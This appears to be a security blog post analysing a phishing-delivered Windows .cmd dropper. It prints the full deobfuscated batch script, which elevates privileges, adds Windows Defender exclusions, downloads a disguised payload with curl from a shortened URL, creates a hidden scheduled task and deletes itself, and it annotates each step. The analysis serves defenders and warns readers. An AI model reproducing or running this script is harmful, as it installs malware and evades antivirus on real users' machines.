Pierluigi Paganini
April 05, 2026
I received this email from a friend to make an analysis. First, let me express my thanks to Janô Falkowski Burkard for this amazing contribution. A little context, He received an email that was really strange and with a URL that was even stranger still
This URL hxxps://search[.]app/a3qBe downloaded a .cmd file.
Opening this file to view its contents shows it’s impossible to understand how it works, as it appears to be encoded, but we can identify some PowerShell commands.
I tried to use tools to deobfuscate the code inside the .cmd file, like:
But I have more success when I put the code into Grok AI; only part of it works.
Here is part of the malicious code decoded to plain text (Don’t run this on your Laptop or Desktop)
@echo off
setlocal EnableDelayedExpansion
:: 1. Check for administrator privileges and elevate if needed
net session >nul 2>&1
if %errorLevel% neq 0 (
powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs"
exit /b
)
:: 2. Define the installation folder (hidden by a leading space in the name)
set "install_dir=%LOCALAPPDATA%\Microsoft\ lLctrJyDE"
if not exist "!install_dir!" mkdir "!install_dir!" >nul 2>&1
:: 3. Add the folder to Windows Defender exclusions
powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue" >nul 2>&1
:: 4. Download the payload (tries up to 3 times)
set "url=https://is.gd/cjIjvU"
set "jpg_file=!install_dir!\GWTcCSbX.jpg"
set "zip_file=!install_dir!\GWTcCSbX.zip"
set "attempt=0"
:download
if !attempt! GEQ 3 goto :failure
set /a attempt+=1
"%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!" 2>nul
if not exist "!jpg_file!" (
ping 127.0.0.1 -n 3 >nul
goto :download
)
:: Check if downloaded file is too small (likely failed)
for %%Z in ("!jpg_file!") do if %%~zZ LSS 1024 (
del /f /q "!jpg_file!" >nul 2>&1
ping 127.0.0.1 -n 3 >nul
goto :download
)
:: 5. Rename .jpg to .zip and extract it
ren "!jpg_file!" GWTcCSbX.zip 2>nul
tar -xf "!zip_file!" -C "!install_dir!" 2>nul
del /f /q "!zip_file!" >nul 2>&1
:: 6. Rename the extracted executable
set "original_exe=!install_dir!\SteelSeriesEngine.exe"
set "final_exe=!install_dir!\UserOOBEBrokervVW.exe"
if not exist "!original_exe!" goto :failure
ren "!original_exe!" UserOOBEBrokervVW.exe
:: 7. Add the final executable to Windows Defender exclusions
powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!final_exe!' -ErrorAction SilentlyContinue" >nul 2>&1
:: 8. Create a hidden scheduled task for persistence (runs on logon with 30s delay)
set "xml_file=!install_dir!\t.xml"
(
echo ^<?xml version="1.0" encoding="UTF-16"?^>
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^>
echo ^<Triggers^>
echo ^<LogonTrigger^>
echo ^<Enabled^>true^</Enabled^>
echo ^<Delay^>PT30S^</Delay^>
echo ^</LogonTrigger^>
echo ^</Triggers^>
echo ^<Principals^>
echo ^<Principal^>
echo ^<LogonType^>InteractiveToken^</LogonType^>
echo ^<RunLevel^>LeastPrivilege^</RunLevel^>
echo ^</Principal^>
echo ^</Principals^>
echo ^<Settings^>
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^>
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^>
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^>
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^>
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^>
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^>
echo ^<Enabled^>true^</Enabled^>
echo ^<Hidden^>true^</Hidden^>
echo ^</Settings^>
echo ^<Actions^>
echo ^<Exec^>
echo ^<Command^>!final_exe!^</Command^>
echo ^</Exec^>
echo ^</Actions^>
echo ^</Task^>
) > "!xml_file!"
schtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f >nul 2>&1
del /f /q "!xml_file!" >nul 2>&1
:: 9. Quick cleanup of any leftover download files
for %%F in ("%USERPROFILE%\Downloads\document_*.zip") do del /f /q "%%F" >nul 2>&1
:: 10. Reboot the computer in 60 seconds and self-delete
shutdown /r /t 60 /f
start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""
exit /b 0
:failure
:: Cleanup if anything fails
if exist "!zip_file!" del /f /q "!zip_file!" >nul 2>&1
if exist "!jpg_file!" del /f /q "!jpg_file!" >nul 2>&1
if exist "!install_dir!" rd /s /q "!install_dir!" >nul 2>&1
start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""
exit /b 0This file .cmd ran a lot of commands, but I’ll focus only on this:
powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs"Privilege escalation (run as administrator)
powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue" >nul 2>&1Add antivirus exclusion (Windows Defender)
Note: This allows files in that folder to run without being scanned
set "url=https://is.gd/cjIjvU"Declare the URL variable passing the malicious website.
"%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!" 2>nulDownload a remote file
Note: Likely disguised — it may not actually be an image
tar -xf "!zip_file!" -C "!install_dir!" 2>nulExtract an archive
Note: This usually contains executable payloads
powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!final_exe!' -ErrorAction SilentlyContinue" >nul 2>&1Add specific file exclusion
Note: Suggests this executable is the main payload
schtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f >nul 2>&1Persistence via a scheduled task
Note: Ensures the malware runs automatically
shutdown /r /t 60 /fForce system reboot
Note: Likely used to finalize installation
start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""Self-deletion
Note: Removes evidence
I’ll focus on website access. Here you can see when I try to open the URL hxxps://is[.]gd/cjIjvU, I’m redirected to another site. I’ll talk about it in the next steps.
The original URL attempts to open a possible image (Fake), as shown above.
When I check the unshortened URL (above), it’s the same as the one I received during my test. Normally, the attacker attempts to use a shortened URL to bypass tools and users. But initially, the shortened URL directs to hxxps://associatecountrynotifications[.]digital/document/ as shown in the image I included at the beginning of the article. (below)
The file downloaded appears to be a .jpg or picture, but when we try to open it, we get a message saying it isn’t supported.
Since I saw a tar command in the .cmd file, I renamed the file to this zip extension to see if it works, and guess what? Abra Cadabra, the magic happens. After this, I unzip the file, which creates a folder with the same name (see below).
When I opened the folder, I found two files: a DLL and a Binary, as shown below.
Now I’m using my favorite tool to start my analysis: PEStudio. An initial analysis of the DLL file yields some interesting insights. No Virustotal reputation, but the tool identified 78 red flags.
When we look at the details, we can identify many functions in the imports tab.
In the image below, you’ll see many functions duplicated; some malware creates this to confuse analysts or analysis tools.
I made the same with the binary.
During my investigation, I noticed something strange: the binary’s compile time was really old. For me, the attacker, Back to the Future (I love this movie), and compiled this file at a time when there was no software for game devices like mice and keyboards. This executable has been created to work alongside the DLL to exploit a vulnerability.
Riproduci
Create this table for each step the malware executes on the virtual machine (Remember, don’t execute this on your Laptop/Desktop).
The original report also includes Indicator of Compromise (IoCs).
About the author: Zoziel Pinto Freire
Cyber Security Manager | Forensic Expert | Malware Analysis | Malware Developer | Threat Hunter | BlueTeam | Incident Responder | Researcher
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, malware)
